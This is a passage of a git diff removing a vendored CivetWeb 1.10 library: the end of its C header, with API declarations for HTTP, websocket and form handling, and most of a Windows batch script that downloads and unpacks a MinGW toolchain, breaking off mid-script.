-CIVETWEB_API void mg_unlock_connection(struct mg_connection *conn);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-#define mg_lock mg_lock_connection
-#define mg_unlock mg_unlock_connection
-#endif
-
-
-/* Lock server context.  This lock may be used to protect resources
-   that are shared between different connection/worker threads. */
-CIVETWEB_API void mg_lock_context(struct mg_context *ctx);
-CIVETWEB_API void mg_unlock_context(struct mg_context *ctx);
-
-
-/* Opcodes, from http://tools.ietf.org/html/rfc6455 */
-/* Old nomenclature */
-enum {
-	WEBSOCKET_OPCODE_CONTINUATION = 0x0,
-	WEBSOCKET_OPCODE_TEXT = 0x1,
-	WEBSOCKET_OPCODE_BINARY = 0x2,
-	WEBSOCKET_OPCODE_CONNECTION_CLOSE = 0x8,
-	WEBSOCKET_OPCODE_PING = 0x9,
-	WEBSOCKET_OPCODE_PONG = 0xa
-};
-
-/* New nomenclature */
-enum {
-	MG_WEBSOCKET_OPCODE_CONTINUATION = 0x0,
-	MG_WEBSOCKET_OPCODE_TEXT = 0x1,
-	MG_WEBSOCKET_OPCODE_BINARY = 0x2,
-	MG_WEBSOCKET_OPCODE_CONNECTION_CLOSE = 0x8,
-	MG_WEBSOCKET_OPCODE_PING = 0x9,
-	MG_WEBSOCKET_OPCODE_PONG = 0xa
-};
-
-/* Macros for enabling compiler-specific checks for printf-like arguments. */
-#undef PRINTF_FORMAT_STRING
-#if defined(_MSC_VER) && _MSC_VER >= 1400
-#include <sal.h>
-#if defined(_MSC_VER) && _MSC_VER > 1400
-#define PRINTF_FORMAT_STRING(s) _Printf_format_string_ s
-#else
-#define PRINTF_FORMAT_STRING(s) __format_string s
-#endif
-#else
-#define PRINTF_FORMAT_STRING(s) s
-#endif
-
-#ifdef __GNUC__
-#define PRINTF_ARGS(x, y) __attribute__((format(printf, x, y)))
-#else
-#define PRINTF_ARGS(x, y)
-#endif
-
-
-/* Send data to the client using printf() semantics.
-   Works exactly like mg_write(), but allows to do message formatting. */
-CIVETWEB_API int mg_printf(struct mg_connection *,
-                           PRINTF_FORMAT_STRING(const char *fmt),
-                           ...) PRINTF_ARGS(2, 3);
-
-
-/* Send a part of the message body, if chunked transfer encoding is set.
- * Only use this function after sending a complete HTTP request or response
- * header with "Transfer-Encoding: chunked" set. */
-CIVETWEB_API int mg_send_chunk(struct mg_connection *conn,
-                               const char *chunk,
-                               unsigned int chunk_len);
-
-
-/* Send contents of the entire file together with HTTP headers. */
-CIVETWEB_API void mg_send_file(struct mg_connection *conn, const char *path);
-
-
-/* Send HTTP error reply. */
-CIVETWEB_API void mg_send_http_error(struct mg_connection *conn,
-                                     int status_code,
-                                     PRINTF_FORMAT_STRING(const char *fmt),
-                                     ...) PRINTF_ARGS(3, 4);
-
-
-/* Send HTTP digest access authentication request.
- * Browsers will send a user name and password in their next request, showing
- * an authentication dialog if the password is not stored.
- * Parameters:
- *   conn: Current connection handle.
- *   realm: Authentication realm. If NULL is supplied, the sever domain
- *          set in the authentication_domain configuration is used.
- * Return:
- *   < 0   Error
- */
-CIVETWEB_API int
-mg_send_digest_access_authentication_request(struct mg_connection *conn,
-                                             const char *realm);
-
-
-/* Check if the current request has a valid authentication token set.
- * A file is used to provide a list of valid user names, realms and
- * password hashes. The file can be created and modified using the
- * mg_modify_passwords_file API function.
- * Parameters:
- *   conn: Current connection handle.
- *   realm: Authentication realm. If NULL is supplied, the sever domain
- *          set in the authentication_domain configuration is used.
- *   filename: Path and name of a file storing multiple password hashes.
- * Return:
- *   > 0   Valid authentication
- *   0     Invalid authentication
- *   < 0   Error (all values < 0 should be considered as invalid
- *         authentication, future error codes will have negative
- *         numbers)
- *   -1    Parameter error
- *   -2    File not found
- */
-CIVETWEB_API int
-mg_check_digest_access_authentication(struct mg_connection *conn,
-                                      const char *realm,
-                                      const char *filename);
-
-
-/* Send contents of the entire file together with HTTP headers.
- * Parameters:
- *   conn: Current connection handle.
- *   path: Full path to the file to send.
- *   mime_type: Content-Type for file.  NULL will cause the type to be
- *              looked up by the file extension.
- */
-CIVETWEB_API void mg_send_mime_file(struct mg_connection *conn,
-                                    const char *path,
-                                    const char *mime_type);
-
-
-/* Send contents of the entire file together with HTTP headers.
-   Parameters:
-     conn: Current connection information.
-     path: Full path to the file to send.
-     mime_type: Content-Type for file.  NULL will cause the type to be
-                looked up by the file extension.
-     additional_headers: Additional custom header fields appended to the header.
-                         Each header should start with an X-, to ensure it is
-                         not included twice.
-                         NULL does not append anything.
-*/
-CIVETWEB_API void mg_send_mime_file2(struct mg_connection *conn,
-                                     const char *path,
-                                     const char *mime_type,
-                                     const char *additional_headers);
-
-
-/* Store body data into a file. */
-CIVETWEB_API long long mg_store_body(struct mg_connection *conn,
-                                     const char *path);
-/* Read entire request body and store it in a file "path".
-   Return:
-     < 0   Error
-     >= 0  Number of bytes stored in file "path".
-*/
-
-
-/* Read data from the remote end, return number of bytes read.
-   Return:
-     0     connection has been closed by peer. No more data could be read.
-     < 0   read error. No more data could be read from the connection.
-     > 0   number of bytes read into the buffer. */
-CIVETWEB_API int mg_read(struct mg_connection *, void *buf, size_t len);
-
-
-/* Get the value of particular HTTP header.
-
-   This is a helper function. It traverses request_info->http_headers array,
-   and if the header is present in the array, returns its value. If it is
-   not present, NULL is returned. */
-CIVETWEB_API const char *mg_get_header(const struct mg_connection *,
-                                       const char *name);
-
-
-/* Get a value of particular form variable.
-
-   Parameters:
-     data: pointer to form-uri-encoded buffer. This could be either POST data,
-           or request_info.query_string.
-     data_len: length of the encoded data.
-     var_name: variable name to decode from the buffer
-     dst: destination buffer for the decoded variable
-     dst_len: length of the destination buffer
-
-   Return:
-     On success, length of the decoded variable.
-     On error:
-        -1 (variable not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            decoded variable).
-
-   Destination buffer is guaranteed to be '\0' - terminated if it is not
-   NULL or zero length. */
-CIVETWEB_API int mg_get_var(const char *data,
-                            size_t data_len,
-                            const char *var_name,
-                            char *dst,
-                            size_t dst_len);
-
-
-/* Get a value of particular form variable.
-
-   Parameters:
-     data: pointer to form-uri-encoded buffer. This could be either POST data,
-           or request_info.query_string.
-     data_len: length of the encoded data.
-     var_name: variable name to decode from the buffer
-     dst: destination buffer for the decoded variable
-     dst_len: length of the destination buffer
-     occurrence: which occurrence of the variable, 0 is the first, 1 the
-                 second...
-                this makes it possible to parse a query like
-                b=x&a=y&a=z which will have occurrence values b:0, a:0 and a:1
-
-   Return:
-     On success, length of the decoded variable.
-     On error:
-        -1 (variable not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            decoded variable).
-
-   Destination buffer is guaranteed to be '\0' - terminated if it is not
-   NULL or zero length. */
-CIVETWEB_API int mg_get_var2(const char *data,
-                             size_t data_len,
-                             const char *var_name,
-                             char *dst,
-                             size_t dst_len,
-                             size_t occurrence);
-
-
-/* Fetch value of certain cookie variable into the destination buffer.
-
-   Destination buffer is guaranteed to be '\0' - terminated. In case of
-   failure, dst[0] == '\0'. Note that RFC allows many occurrences of the same
-   parameter. This function returns only first occurrence.
-
-   Return:
-     On success, value length.
-     On error:
-        -1 (either "Cookie:" header is not present at all or the requested
-            parameter is not found).
-        -2 (destination buffer is NULL, zero length or too small to hold the
-            value). */
-CIVETWEB_API int mg_get_cookie(const char *cookie,
-                               const char *var_name,
-                               char *buf,
-                               size_t buf_len);
-
-
-/* Download data from the remote web server.
-     host: host name to connect to, e.g. "foo.com", or "10.12.40.1".
-     port: port number, e.g. 80.
-     use_ssl: wether to use SSL connection.
-     error_buffer, error_buffer_size: error message placeholder.
-     request_fmt,...: HTTP request.
-   Return:
-     On success, valid pointer to the new connection, suitable for mg_read().
-     On error, NULL. error_buffer contains error message.
-   Example:
-     char ebuf[100];
-     struct mg_connection *conn;
-     conn = mg_download("google.com", 80, 0, ebuf, sizeof(ebuf),
-                        "%s", "GET / HTTP/1.0\r\nHost: google.com\r\n\r\n");
- */
-CIVETWEB_API struct mg_connection *
-mg_download(const char *host,
-            int port,
-            int use_ssl,
-            char *error_buffer,
-            size_t error_buffer_size,
-            PRINTF_FORMAT_STRING(const char *request_fmt),
-            ...) PRINTF_ARGS(6, 7);
-
-
-/* Close the connection opened by mg_download(). */
-CIVETWEB_API void mg_close_connection(struct mg_connection *conn);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* File upload functionality. Each uploaded file gets saved into a temporary
-   file and MG_UPLOAD event is sent.
-   Return number of uploaded files.
-   Deprecated: Use mg_handle_form_request instead. */
-CIVETWEB_API int mg_upload(struct mg_connection *conn,
-                           const char *destination_dir);
-#endif
-
-
-/* This structure contains callback functions for handling form fields.
-   It is used as an argument to mg_handle_form_request. */
-struct mg_form_data_handler {
-	/* This callback function is called, if a new field has been found.
-	 * The return value of this callback is used to define how the field
-	 * should be processed.
-	 *
-	 * Parameters:
-	 *   key: Name of the field ("name" property of the HTML input field).
-	 *   filename: Name of a file to upload, at the client computer.
-	 *             Only set for input fields of type "file", otherwise NULL.
-	 *   path: Output parameter: File name (incl. path) to store the file
-	 *         at the server computer. Only used if FORM_FIELD_STORAGE_STORE
-	 *         is returned by this callback. Existing files will be
-	 *         overwritten.
-	 *   pathlen: Length of the buffer for path.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   The callback must return the intended storage for this field
-	 *   (See FORM_FIELD_STORAGE_*).
-	 */
-	int (*field_found)(const char *key,
-	                   const char *filename,
-	                   char *path,
-	                   size_t pathlen,
-	                   void *user_data);
-
-	/* If the "field_found" callback returned FORM_FIELD_STORAGE_GET,
-	 * this callback will receive the field data.
-	 *
-	 * Parameters:
-	 *   key: Name of the field ("name" property of the HTML input field).
-	 *   value: Value of the input field.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   TODO: Needs to be defined.
-	 */
-	int (*field_get)(const char *key,
-	                 const char *value,
-	                 size_t valuelen,
-	                 void *user_data);
-
-	/* If the "field_found" callback returned FORM_FIELD_STORAGE_STORE,
-	 * the data will be stored into a file. If the file has been written
-	 * successfully, this callback will be called. This callback will
-	 * not be called for only partially uploaded files. The
-	 * mg_handle_form_request function will either store the file completely
-	 * and call this callback, or it will remove any partial content and
-	 * not call this callback function.
-	 *
-	 * Parameters:
-	 *   path: Path of the file stored at the server.
-	 *   file_size: Size of the stored file in bytes.
-	 *   user_data: Value of the member user_data of mg_form_data_handler
-	 *
-	 * Return value:
-	 *   TODO: Needs to be defined.
-	 */
-	int (*field_store)(const char *path, long long file_size, void *user_data);
-
-	/* User supplied argument, passed to all callback functions. */
-	void *user_data;
-};
-
-
-/* Return values definition for the "field_found" callback in
- * mg_form_data_handler. */
-/* Old nomenclature */
-enum {
-	/* Skip this field (neither get nor store it). Continue with the
-     * next field. */
-	FORM_FIELD_STORAGE_SKIP = 0x0,
-	/* Get the field value. */
-	FORM_FIELD_STORAGE_GET = 0x1,
-	/* Store the field value into a file. */
-	FORM_FIELD_STORAGE_STORE = 0x2,
-	/* Stop parsing this request. Skip the remaining fields. */
-	FORM_FIELD_STORAGE_ABORT = 0x10
-};
-
-/* New nomenclature */
-enum {
-	/* Skip this field (neither get nor store it). Continue with the
-     * next field. */
-	MG_FORM_FIELD_STORAGE_SKIP = 0x0,
-	/* Get the field value. */
-	MG_FORM_FIELD_STORAGE_GET = 0x1,
-	/* Store the field value into a file. */
-	MG_FORM_FIELD_STORAGE_STORE = 0x2,
-	/* Stop parsing this request. Skip the remaining fields. */
-	MG_FORM_FIELD_STORAGE_ABORT = 0x10
-};
-
-/* Process form data.
- * Returns the number of fields handled, or < 0 in case of an error.
- * Note: It is possible that several fields are already handled successfully
- * (e.g., stored into files), before the request handling is stopped with an
- * error. In this case a number < 0 is returned as well.
- * In any case, it is the duty of the caller to remove files once they are
- * no longer required. */
-CIVETWEB_API int mg_handle_form_request(struct mg_connection *conn,
-                                        struct mg_form_data_handler *fdh);
-
-
-/* Convenience function -- create detached thread.
-   Return: 0 on success, non-0 on error. */
-typedef void *(*mg_thread_func_t)(void *);
-CIVETWEB_API int mg_start_thread(mg_thread_func_t f, void *p);
-
-
-/* Return builtin mime type for the given file name.
-   For unrecognized extensions, "text/plain" is returned. */
-CIVETWEB_API const char *mg_get_builtin_mime_type(const char *file_name);
-
-
-/* Get text representation of HTTP status code. */
-CIVETWEB_API const char *
-mg_get_response_code_text(const struct mg_connection *conn, int response_code);
-
-
-/* Return CivetWeb version. */
-CIVETWEB_API const char *mg_version(void);
-
-
-/* URL-decode input buffer into destination buffer.
-   0-terminate the destination buffer.
-   form-url-encoded data differs from URI encoding in a way that it
-   uses '+' as character for space, see RFC 1866 section 8.2.1
-   http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-   Return: length of the decoded data, or -1 if dst buffer is too small. */
-CIVETWEB_API int mg_url_decode(const char *src,
-                               int src_len,
-                               char *dst,
-                               int dst_len,
-                               int is_form_url_encoded);
-
-
-/* URL-encode input buffer into destination buffer.
-   returns the length of the resulting buffer or -1
-   is the buffer is too small. */
-CIVETWEB_API int mg_url_encode(const char *src, char *dst, size_t dst_len);
-
-
-/* MD5 hash given strings.
-   Buffer 'buf' must be 33 bytes long. Varargs is a NULL terminated list of
-   ASCIIz strings. When function returns, buf will contain human-readable
-   MD5 hash. Example:
-     char buf[33];
-     mg_md5(buf, "aa", "bb", NULL); */
-CIVETWEB_API char *mg_md5(char buf[33], ...);
-
-
-/* Print error message to the opened error log stream.
-   This utilizes the provided logging configuration.
-     conn: connection (not used for sending data, but to get perameters)
-     fmt: format string without the line return
-     ...: variable argument list
-   Example:
-     mg_cry(conn,"i like %s", "logging"); */
-CIVETWEB_API void mg_cry(const struct mg_connection *conn,
-                         PRINTF_FORMAT_STRING(const char *fmt),
-                         ...) PRINTF_ARGS(2, 3);
-
-
-/* utility methods to compare two buffers, case insensitive. */
-CIVETWEB_API int mg_strcasecmp(const char *s1, const char *s2);
-CIVETWEB_API int mg_strncasecmp(const char *s1, const char *s2, size_t len);
-
-
-/* Connect to a websocket as a client
-   Parameters:
-     host: host to connect to, i.e. "echo.websocket.org" or "192.168.1.1" or
-   "localhost"
-     port: server port
-     use_ssl: make a secure connection to server
-     error_buffer, error_buffer_size: buffer for an error message
-     path: server path you are trying to connect to, i.e. if connection to
-   localhost/app, path should be "/app"
-     origin: value of the Origin HTTP header
-     data_func: callback that should be used when data is received from the
-   server
-     user_data: user supplied argument
-
-   Return:
-     On success, valid mg_connection object.
-     On error, NULL. Se error_buffer for details.
-*/
-CIVETWEB_API struct mg_connection *
-mg_connect_websocket_client(const char *host,
-                            int port,
-                            int use_ssl,
-                            char *error_buffer,
-                            size_t error_buffer_size,
-                            const char *path,
-                            const char *origin,
-                            mg_websocket_data_handler data_func,
-                            mg_websocket_close_handler close_func,
-                            void *user_data);
-
-
-/* Connect to a TCP server as a client (can be used to connect to a HTTP server)
-   Parameters:
-     host: host to connect to, i.e. "www.wikipedia.org" or "192.168.1.1" or
-   "localhost"
-     port: server port
-     use_ssl: make a secure connection to server
-     error_buffer, error_buffer_size: buffer for an error message
-
-   Return:
-     On success, valid mg_connection object.
-     On error, NULL. Se error_buffer for details.
-*/
-CIVETWEB_API struct mg_connection *mg_connect_client(const char *host,
-                                                     int port,
-                                                     int use_ssl,
-                                                     char *error_buffer,
-                                                     size_t error_buffer_size);
-
-
-struct mg_client_options {
-	const char *host;
-	int port;
-	const char *client_cert;
-	const char *server_cert;
-	/* TODO: add more data */
-};
-
-
-CIVETWEB_API struct mg_connection *
-mg_connect_client_secure(const struct mg_client_options *client_options,
-                         char *error_buffer,
-                         size_t error_buffer_size);
-
-
-enum { TIMEOUT_INFINITE = -1 };
-enum { MG_TIMEOUT_INFINITE = -1 };
-
-/* Wait for a response from the server
-   Parameters:
-     conn: connection
-     ebuf, ebuf_len: error message placeholder.
-     timeout: time to wait for a response in milliseconds (if < 0 then wait
-   forever)
-
-   Return:
-     On success, >= 0
-     On error/timeout, < 0
-*/
-CIVETWEB_API int mg_get_response(struct mg_connection *conn,
-                                 char *ebuf,
-                                 size_t ebuf_len,
-                                 int timeout);
-
-
-/* Check which features where set when the civetweb library has been compiled.
-   The function explicitly addresses compile time defines used when building
-   the library - it does not mean, the feature has been initialized using a
-   mg_init_library call.
-   mg_check_feature can be called anytime, even before mg_init_library has
-   been called.
-
-   Parameters:
-     feature: specifies which feature should be checked
-       The value is a bit mask. The individual bits are defined as:
-         1  serve files (NO_FILES not set)
-         2  support HTTPS (NO_SSL not set)
-         4  support CGI (NO_CGI not set)
-         8  support IPv6 (USE_IPV6 set)
-        16  support WebSocket (USE_WEBSOCKET set)
-        32  support Lua scripts and Lua server pages (USE_LUA is set)
-        64  support server side JavaScript (USE_DUKTAPE is set)
-       128  support caching (NO_CACHING not set)
-       256  support server statistics (USE_SERVER_STATS is set)
-       The result is undefined, if bits are set that do not represent a
-       defined feature (currently: feature >= 512).
-       The result is undefined, if no bit is set (feature == 0).
-
-   Return:
-     If feature is available, the corresponding bit is set
-     If feature is not available, the bit is 0
-*/
-CIVETWEB_API unsigned mg_check_feature(unsigned feature);
-
-
-/* Get information on the system. Useful for support requests.
-   Parameters:
-     buffer: Store system information as string here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-   Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value.
-*/
-CIVETWEB_API int mg_get_system_info(char *buffer, int buflen);
-
-
-/* Get context information. Useful for server diagnosis.
-   Parameters:
-     ctx: Context handle
-     buffer: Store context information here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-     Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value. However, since the available
-     context information changes, you should allocate a few bytes more.
-*/
-CIVETWEB_API int
-mg_get_context_info(const struct mg_context *ctx, char *buffer, int buflen);
-
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-/* Get connection information. Useful for server diagnosis.
-   Parameters:
-     ctx: Context handle
-     idx: Connection index
-     buffer: Store context information here.
-     buflen: Length of buffer (including a byte required for a terminating 0).
-   Return:
-     Available size of system information, exluding a terminating 0.
-     The information is complete, if the return value is smaller than buflen.
-     The result is a JSON formatted string, the exact content may vary.
-   Note:
-     It is possible to determine the required buflen, by first calling this
-     function with buffer = NULL and buflen = NULL. The required buflen is
-     one byte more than the returned value. However, since the available
-     context information changes, you should allocate a few bytes more.
-*/
-CIVETWEB_API int mg_get_connection_info(const struct mg_context *ctx,
-                                        int idx,
-                                        char *buffer,
-                                        int buflen);
-#endif
-
-
-#ifdef __cplusplus
-}
-#endif /* __cplusplus */
-
-#endif /* CIVETWEB_HEADER_INCLUDED */
diff --git a/thirdparty/civetweb-1.10/mingw.cmd b/thirdparty/civetweb-1.10/mingw.cmd
deleted file mode 100644
index 4b26215..0000000
--- a/thirdparty/civetweb-1.10/mingw.cmd
+++ /dev/null
@@ -1,884 +0,0 @@
-:: Make sure the extensions are enabled
-@verify other 2>nul
-@setlocal EnableExtensions EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :print_usage "Failed to enable extensions"
-  @exit /b 1
-)
-
-::Change the code page to unicode
-@chcp 65001 1>nul 2>nul
-@if errorlevel 1 (
-  @call :print_usage "Failed to change the code page to unicode"
-  @exit /b 1
-)
-
-:: Set up some global variables
-@set "script_name=%~nx0"
-@set "script_folder=%~dp0"
-@set "script_folder=%script_folder:~0,-1%"
-@set "dependency_path=%TEMP%\mingw-build-dependencies"
-
-:: Check the command line parameters
-@set logging_level=1
-:options_loop
-@if [%1] == [] goto :options_parsed
-@set "arg=%~1"
-@set one=%arg:~0,1%
-@set two=%arg:~0,2%
-@set three=%arg:~0,3%
-@if /i [%arg%] == [/?] (
-  @call :print_usage "Downloads a specific version of MinGW"
-  @exit /b 0
-)
-@if /i [%arg%] == [/q] set quiet=true
-@if /i [%two%] == [/v] @if /i not [%three%] == [/ve] @call :verbosity "!arg!"
-@if /i [%arg%] == [/version] set "version=%~2" & shift
-@if /i [%arg%] == [/arch] set "arch=%~2" & shift
-@if /i [%arg%] == [/exceptions] set "exceptions=%~2" & shift
-@if /i [%arg%] == [/threading] set "threading=%~2" & shift
-@if /i [%arg%] == [/revision] set "revision=%~2" & shift
-@if /i not [!one!] == [/] (
-  if not defined output_path (
-    set output_path=!arg!
-  ) else (
-    @call :print_usage "Too many output locations: !output_path! !arg!" ^
-                       "There should only be one output location"
-    @exit /b 1
-  )
-)
-@shift
-@goto :options_loop
-:options_parsed
-@if defined quiet set logging_level=0
-@if not defined output_path set "output_path=%script_folder%\mingw-builds"
-@set "output_path=%output_path:/=\%"
-
-:: Set up the logging
-@set "log_folder=%output_path%\logs"
-@call :iso8601 timestamp
-@set "log_path=%log_folder%\%timestamp%.log"
-@set log_keep=10
-
-:: Get default architecture
-@if not defined arch @call :architecture arch
-
-:: Only keep a certain amount of logs
-@set /a "log_keep=log_keep-1"
-@if not exist %log_folder% @mkdir %log_folder%
-@for /f "skip=%log_keep%" %%f in ('dir /b /o-D /tc %log_folder%') do @(
-  @call :log 4 "Removing old log file %log_folder%\%%f"
-  del %log_folder%\%%f
-)
-
-:: Set up some more global variables
-@call :windows_version win_ver win_ver_major win_ver_minor win_ver_rev
-@call :script_source script_source
-@if [%script_source%] == [explorer] (
-  set /a "logging_level=logging_level+1"
-)
-
-:: Execute the main function
-@call :main "%arch%" "%version%" "%threading%" "%exceptions%" "%revision%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download MinGW"
-  @call :log 0 "View the log at %log_path%"
-  @exit /b 1
-)
-
-:: Stop the script if the user double clicked
-@if [%script_source%] == [explorer] (
-  pause
-)
-
-@endlocal
-@goto :eof
-
-:: -------------------------- Functions start here ----------------------------
-
-:main - Main function that performs the download
-:: %1 - Target architecture
-:: %2 - Version of MinGW to get [optional]
-:: %3 - Threading model [optional]
-:: %4 - Exception model [optional]
-:: %5 - Package revision [optional]
-@setlocal
-@call :log 6
-@call :log 2 "Welcome to the MinGW download script"
-@call :log 6 "------------------------------------"
-@call :log 6
-@call :log 2 "This script downloads a specific version of MinGW"
-@set "arch=%~1"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~2"
-@set "threading=%~3"
-@set "exceptions=%~4"
-@set "revision=%~5"
-@call :log 3 "arch       = %arch%"
-@call :log 3 "version    = %version%"
-@call :log 3 "exceptions = %exceptions%"
-@call :log 3 "threading  = %threading%"
-@call :log 3 "revision   = %revision%"
-@call :repository repo
-@if errorlevel 1 (
-  @call :log 0 "Failed to get the MinGW-builds repository information"
-  @exit /b 1
-)
-@call :resolve slug url "%repo%" "%arch%" "%version%" "%threading%" "%exceptions%" "%revision%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to resolve the correct URL of MinGW"
-  @exit /b 1
-)
-@call :unpack compiler_path "%url%" "%output_path%\mingw\%slug%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to unpack the MinGW archive"
-  @exit /b 1
-)
-@rmdir /s /q "%dependency_path%"
-@echo.%compiler_path%
-@endlocal
-@goto :eof
-
-:repository - Gets the MinGW-builds repository
-:: %1 - The return variable for the repository file path
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@call :log 7
-@call :log 2 "Getting MinGW repository information"
-@set "url=http://downloads.sourceforge.net/project/mingw-w64/Toolchains targetting Win32/Personal Builds/mingw-builds/installer/repository.txt"
-@call :log 6
-@call :log 1 "Downloading MinGW repository"
-@set "file_path=%dependency_path%\mingw-repository.txt"
-@call :download "%url%" "%file_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download the MinGW repository information"
-  @exit /b 1
-)
-@set "repository_path=%dependency_path%\repository.txt"
-@del "%repository_path%" 2>nul
-@for /f "delims=| tokens=1-6,*" %%a in (%file_path%) do @(
-  @set "version=%%~a"
-  @set "version=!version: =!"
-  @set "arch=%%~b"
-  @set "arch=!arch: =!"
-  @set "threading=%%~c"
-  @set "threading=!threading: =!"
-  @set "exceptions=%%~d"
-  @set "exceptions=!exceptions: =!"
-  @set "revision=%%~e"
-  @set "revision=!revision: =!"
-  @set "revision=!revision:rev=!"
-  @set "url=%%~f"
-  @set "url=!url:%%20= !"
-  @for /l %%a in (1,1,32) do @if "!url:~-1!" == " " set url=!url:~0,-1!
-  @echo !arch!^|!version!^|!threading!^|!exceptions!^|!revision!^|!url!>> "%repository_path%"
-)
-@del "%file_path%" 2>nul
-@endlocal & set "%var%=%repository_path%"
-@goto :eof
-
-:resolve - Gets the MinGW-builds repository
-:: %1 - The return variable for the MinGW slug
-:: %2 - The return variable for the MinGW URL
-:: %3 - The repository information to use
-:: %4 - Target architecture
-:: %5 - Version of MinGW to get [optional]
-:: %6 - Threading model [optional]
-:: %7 - Exception model [optional]
-:: %8 - Package revision [optional]
-@setlocal
-@set "slug_var=%~1"
-@if "%slug_var%" == "" @exit /b 1
-@set "url_var=%~2"
-@if "%url_var%" == "" @exit /b 1
-@set "repository=%~3"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~4"
-@if "%arch%" == "" @exit /b 1
-@call :resolve_version version "%repository%" "%arch%" "%~5"
-@if errorlevel 1 @exit /b 1
-@call :resolve_threading threading "%repository%" "%arch%" "%version%" "%~6"
-@if errorlevel 1 @exit /b 1
-@call :resolve_exceptions exceptions "%repository%" "%arch%" "%version%" "%threading%" "%~7"
-@if errorlevel 1 @exit /b 1
-@call :resolve_revision revision "%repository%" "%arch%" "%version%" "%threading%" "%exceptions%" "%~8"
-@if errorlevel 1 @exit /b 1
-@call :log 3 "Finding URL"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if "%exceptions%" == "%%d" (
-          @if "%revision%" == "%%e" (
-            @set "url=%%f"
-) ) ) ) ) )
-@if "%url%" == "" (
-  @call :log 0 "Failed to resolve URL"
-  @exit /b 1
-)
-@set slug=gcc-%version%-%arch%-%threading%-%exceptions%-rev%revision%
-@call :log 2 "Resolved slug: %slug%"
-@call :log 2 "Resolved url: %url%"
-@endlocal & set "%slug_var%=%slug%" & set "%url_var%=%url%"
-@goto :eof
-
-:unpack - Unpacks the MinGW archive
-:: %1 - The return variable name for the compiler path
-:: %2 - The filepath or URL of the archive
-:: %3 - The folder to unpack to
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "archive_path=%~2"
-@if "%archive_path%" == "" @exit /b 1
-@set "folder_path=%~3"
-@if "%folder_path%" == "" @exit /b 1
-@set "compiler_path=%folder_path%\bin"
-@if exist "%compiler_path%" goto :unpack_done
-@call :log 7
-@call :log 2 "Unpacking MinGW archive"
-@set "http=%archive_path:~0,4%"
-@if "%http%" == "http" (
-  @set "url=%archive_path%"
-  @for /f %%a in ("!url: =-!") do @set "file_name=%%~na"
-  @for /f %%a in ("!url: =-!") do @set "file_ext=%%~xa"
-  @set "archive_path=%dependency_path%\!file_name!!file_ext!"
-  @if not exist "!archive_path!" (
-    @call :log 6
-    @call :log 1 "Downloading MinGW archive"
-    @call :download "!url!" "!archive_path!"
-    @if errorlevel 1 (
-      @del "!archive_path!" 2>nul
-      @call :log 0 "Failed to download: !file_name!!file_ext!"
-      @exit /b 1
-    )
-  )
-)
-@if not exist "%archive_path%" (
-  @call :log 0 "The archive did not exist to unpack: %archive_path%"
-  @exit /b 1
-)
-@for /f %%a in ("%archive_path: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%archive_path: =-%") do @set "file_ext=%%~xa"
-@call :log 6
-@call :log 1 "Unpacking MinGW %file_name%%file_ext%"
-@call :find_sevenzip sevenzip_executable
-@if errorlevel 1 (
-  @call :log 0 "Need 7zip to unpack the MinGW archive"
-  @exit /b 1
-)
-@call :iso8601 iso8601
-@for /f %%a in ("%folder_path%") do @set "tmp_path=%%~dpatmp-%iso8601%"
-@"%sevenzip_executable%" x -y "-o%tmp_path%" "%archive_path%" > nul
-@if errorlevel 1 (
-  @rmdir /s /q "%folder_path%"
-  @call :log 0 "Failed to unpack the MinGW archive"
-  @exit /b 1
-)
-@set "expected_path=%tmp_path%\mingw64"
-@if not exist "%expected_path%" (
-  @set "expected_path=%tmp_path%\mingw32"
-)
-@move /y "%expected_path%" "%folder_path%" > nul
-@if errorlevel 1 (
-  @rmdir /s /q "%tmp_path%" 2>nul
-  @call :log 0 "Failed to move MinGW folder"
-  @call :log 0 "%expected_path%"
-  @call :log 0 "%folder_path%"
-  @exit /b 1
-)
-@rmdir /s /q %tmp_path%
-@set "compiler_path=%folder_path%\bin"
-:unpack_done
-@if not exist "%compiler_path%\gcc.exe" (
-  @call :log 0 "Failed to find gcc: %compiler_path%"
-  @exit /b 1
-)
-@endlocal & set "%var%=%compiler_path%"
-@goto :eof
-
-:find_sevenzip - Finds (or downloads) the 7zip executable
-:: %1 - The return variable for the 7zip executable path
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@call :log 2 "Finding 7zip"
-@call :find_in_path sevenzip_executable 7z.exe
-@if not errorlevel 1 goto :find_sevenzip_done
-@call :find_in_path sevenzip_executable 7za.exe
